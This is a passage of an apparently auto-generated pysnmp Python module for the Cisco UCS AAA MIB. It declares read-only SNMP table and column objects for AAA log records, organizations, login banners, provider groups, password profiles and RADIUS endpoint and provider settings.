cucsAaaModLRDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRDescr.setStatus('current')
cucsAaaModLRId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRId.setStatus('current')
cucsAaaModLRInd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 11), CucsConditionActionIndicator()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRInd.setStatus('current')
cucsAaaModLRSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 12), CucsConditionSeverity()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRSeverity.setStatus('current')
cucsAaaModLRTrig = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 13), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRTrig.setStatus('current')
cucsAaaModLRTxId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 14), Unsigned64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRTxId.setStatus('current')
cucsAaaModLRUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRUser.setStatus('current')
cucsAaaModLRSessionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRSessionId.setStatus('current')
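# cucsAaaOrgTable (1.3.6.1.4.1.9.9.719.1.2.18): AAA organization objects (name, org DN, config state).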
cucsAaaOrgTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18), )
if mibBuilder.loadTexts: cucsAaaOrgTable.setStatus('current')
cucsAaaOrgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaOrgInstanceId"))
if mibBuilder.loadTexts: cucsAaaOrgEntry.setStatus('current')
cucsAaaOrgInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaOrgInstanceId.setStatus('current')
cucsAaaOrgDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgDn.setStatus('current')
cucsAaaOrgRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgRn.setStatus('current')
cucsAaaOrgDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgDescr.setStatus('current')
cucsAaaOrgName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgName.setStatus('current')
cucsAaaOrgOrgDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgOrgDn.setStatus('current')
cucsAaaOrgConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 8), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgConfigState.setStatus('current')
cucsAaaOrgConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 18, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaOrgConfigStatusMessage.setStatus('current')
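# cucsAaaPreLoginBannerTable (1.3.6.1.4.1.9.9.719.1.2.38): pre-login banner message objects.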
cucsAaaPreLoginBannerTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38), )
if mibBuilder.loadTexts: cucsAaaPreLoginBannerTable.setStatus('current')
cucsAaaPreLoginBannerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaPreLoginBannerInstanceId"))
if mibBuilder.loadTexts: cucsAaaPreLoginBannerEntry.setStatus('current')
cucsAaaPreLoginBannerInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaPreLoginBannerInstanceId.setStatus('current')
cucsAaaPreLoginBannerDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerDn.setStatus('current')
cucsAaaPreLoginBannerRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerRn.setStatus('current')
cucsAaaPreLoginBannerDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerDescr.setStatus('current')
cucsAaaPreLoginBannerIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerIntId.setStatus('current')
cucsAaaPreLoginBannerMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerMessage.setStatus('current')
cucsAaaPreLoginBannerName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerName.setStatus('current')
cucsAaaPreLoginBannerPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerPolicyLevel.setStatus('current')
cucsAaaPreLoginBannerPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 38, 1, 9), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPreLoginBannerPolicyOwner.setStatus('current')
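# cucsAaaProviderGroupTable (1.3.6.1.4.1.9.9.719.1.2.19): named groups of AAA providers.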
cucsAaaProviderGroupTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19), )
if mibBuilder.loadTexts: cucsAaaProviderGroupTable.setStatus('current')
cucsAaaProviderGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaProviderGroupInstanceId"))
if mibBuilder.loadTexts: cucsAaaProviderGroupEntry.setStatus('current')
cucsAaaProviderGroupInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaProviderGroupInstanceId.setStatus('current')
cucsAaaProviderGroupDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderGroupDn.setStatus('current')
cucsAaaProviderGroupRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderGroupRn.setStatus('current')
cucsAaaProviderGroupDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderGroupDescr.setStatus('current')
cucsAaaProviderGroupName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderGroupName.setStatus('current')
cucsAaaProviderGroupConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1, 7), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderGroupConfigState.setStatus('current')
cucsAaaProviderGroupSize = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 19, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderGroupSize.setStatus('current')
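# cucsAaaProviderRefTable (1.3.6.1.4.1.9.9.719.1.2.20): ordered provider references (presumably members of a provider group).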
cucsAaaProviderRefTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 20), )
if mibBuilder.loadTexts: cucsAaaProviderRefTable.setStatus('current')
cucsAaaProviderRefEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 20, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaProviderRefInstanceId"))
if mibBuilder.loadTexts: cucsAaaProviderRefEntry.setStatus('current')
cucsAaaProviderRefInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 20, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaProviderRefInstanceId.setStatus('current')
cucsAaaProviderRefDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 20, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderRefDn.setStatus('current')
cucsAaaProviderRefRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 20, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderRefRn.setStatus('current')
cucsAaaProviderRefDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 20, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderRefDescr.setStatus('current')
cucsAaaProviderRefName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 20, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderRefName.setStatus('current')
cucsAaaProviderRefOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 20, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaProviderRefOrder.setStatus('current')
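# cucsAaaPwdProfileTable (1.3.6.1.4.1.9.9.719.1.2.39): password profile policy (change count/interval, expiration warning, history, minimum passphrase length).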
cucsAaaPwdProfileTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39), )
if mibBuilder.loadTexts: cucsAaaPwdProfileTable.setStatus('current')
cucsAaaPwdProfileEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaPwdProfileInstanceId"))
if mibBuilder.loadTexts: cucsAaaPwdProfileEntry.setStatus('current')
cucsAaaPwdProfileInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaPwdProfileInstanceId.setStatus('current')
cucsAaaPwdProfileDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileDn.setStatus('current')
cucsAaaPwdProfileRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileRn.setStatus('current')
cucsAaaPwdProfileChangeCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileChangeCount.setStatus('current')
cucsAaaPwdProfileChangeDuringInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 5), CucsAaaPwdPolicy()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileChangeDuringInterval.setStatus('current')
cucsAaaPwdProfileChangeInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 6), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileChangeInterval.setStatus('current')
cucsAaaPwdProfileDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileDescr.setStatus('current')
cucsAaaPwdProfileExpirationWarnTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileExpirationWarnTime.setStatus('current')
cucsAaaPwdProfileHistoryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileHistoryCount.setStatus('current')
cucsAaaPwdProfileIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileIntId.setStatus('current')
cucsAaaPwdProfileName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileName.setStatus('current')
cucsAaaPwdProfileNoChangeInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileNoChangeInterval.setStatus('current')
cucsAaaPwdProfilePolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 13), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfilePolicyLevel.setStatus('current')
cucsAaaPwdProfilePolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 14), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfilePolicyOwner.setStatus('current')
cucsAaaPwdProfileMinPassphraseLen = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 39, 1, 16), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaPwdProfileMinPassphraseLen.setStatus('current')
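# cucsAaaRadiusEpTable (1.3.6.1.4.1.9.9.719.1.2.21): RADIUS endpoint settings plus FSM summary columns.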
cucsAaaRadiusEpTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21), )
if mibBuilder.loadTexts: cucsAaaRadiusEpTable.setStatus('current')
cucsAaaRadiusEpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRadiusEpInstanceId"))
if mibBuilder.loadTexts: cucsAaaRadiusEpEntry.setStatus('current')
cucsAaaRadiusEpInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRadiusEpInstanceId.setStatus('current')
cucsAaaRadiusEpDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpDn.setStatus('current')
cucsAaaRadiusEpRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpRn.setStatus('current')
cucsAaaRadiusEpDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpDescr.setStatus('current')
cucsAaaRadiusEpFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmDescr.setStatus('current')
cucsAaaRadiusEpFsmPrev = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmPrev.setStatus('current')
cucsAaaRadiusEpFsmProgr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmProgr.setStatus('current')
cucsAaaRadiusEpFsmRmtInvErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmRmtInvErrCode.setStatus('current')
cucsAaaRadiusEpFsmRmtInvErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmRmtInvErrDescr.setStatus('current')
cucsAaaRadiusEpFsmRmtInvRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 10), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmRmtInvRslt.setStatus('current')
cucsAaaRadiusEpFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageDescr.setStatus('current')
cucsAaaRadiusEpFsmStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 12), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStamp.setStatus('current')
cucsAaaRadiusEpFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStatus.setStatus('current')
cucsAaaRadiusEpFsmTry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 14), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmTry.setStatus('current')
cucsAaaRadiusEpIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpIntId.setStatus('current')
cucsAaaRadiusEpName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpName.setStatus('current')
cucsAaaRadiusEpRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 17), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpRetries.setStatus('current')
cucsAaaRadiusEpTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 18), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpTimeout.setStatus('current')
cucsAaaRadiusEpPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 19), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpPolicyLevel.setStatus('current')
cucsAaaRadiusEpPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 21, 1, 20), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpPolicyOwner.setStatus('current')
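# cucsAaaRadiusEpFsmTable (1.3.6.1.4.1.9.9.719.1.2.47): FSM status for the RADIUS endpoint.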
cucsAaaRadiusEpFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47), )
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmTable.setStatus('current')
cucsAaaRadiusEpFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRadiusEpFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmEntry.setStatus('current')
cucsAaaRadiusEpFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmInstanceId.setStatus('current')
cucsAaaRadiusEpFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmDn.setStatus('current')
cucsAaaRadiusEpFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmRn.setStatus('current')
cucsAaaRadiusEpFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmCompletionTime.setStatus('current')
cucsAaaRadiusEpFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 5), CucsAaaRadiusEpFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmCurrentFsm.setStatus('current')
cucsAaaRadiusEpFsmDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmDescrData.setStatus('current')
cucsAaaRadiusEpFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmFsmStatus.setStatus('current')
cucsAaaRadiusEpFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmProgress.setStatus('current')
cucsAaaRadiusEpFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmRmtErrCode.setStatus('current')
cucsAaaRadiusEpFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmRmtErrDescr.setStatus('current')
cucsAaaRadiusEpFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 47, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmRmtRslt.setStatus('current')
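# cucsAaaRadiusEpFsmStageTable (1.3.6.1.4.1.9.9.719.1.2.48): per-stage FSM detail for the RADIUS endpoint.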
cucsAaaRadiusEpFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48), )
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageTable.setStatus('current')
cucsAaaRadiusEpFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRadiusEpFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageEntry.setStatus('current')
cucsAaaRadiusEpFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageInstanceId.setStatus('current')
cucsAaaRadiusEpFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageDn.setStatus('current')
cucsAaaRadiusEpFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageRn.setStatus('current')
cucsAaaRadiusEpFsmStageDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageDescrData.setStatus('current')
cucsAaaRadiusEpFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageLastUpdateTime.setStatus('current')
cucsAaaRadiusEpFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48, 1, 6), CucsAaaRadiusEpFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageName.setStatus('current')
cucsAaaRadiusEpFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageOrder.setStatus('current')
cucsAaaRadiusEpFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageRetry.setStatus('current')
cucsAaaRadiusEpFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 48, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusEpFsmStageStageStatus.setStatus('current')
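# cucsAaaRadiusProviderTable (1.3.6.1.4.1.9.9.719.1.2.22): per-server RADIUS provider settings (auth port, key, order, retries, service, timeout).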
cucsAaaRadiusProviderTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22), )
if mibBuilder.loadTexts: cucsAaaRadiusProviderTable.setStatus('current')
cucsAaaRadiusProviderEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRadiusProviderInstanceId"))
if mibBuilder.loadTexts: cucsAaaRadiusProviderEntry.setStatus('current')
cucsAaaRadiusProviderInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRadiusProviderInstanceId.setStatus('current')
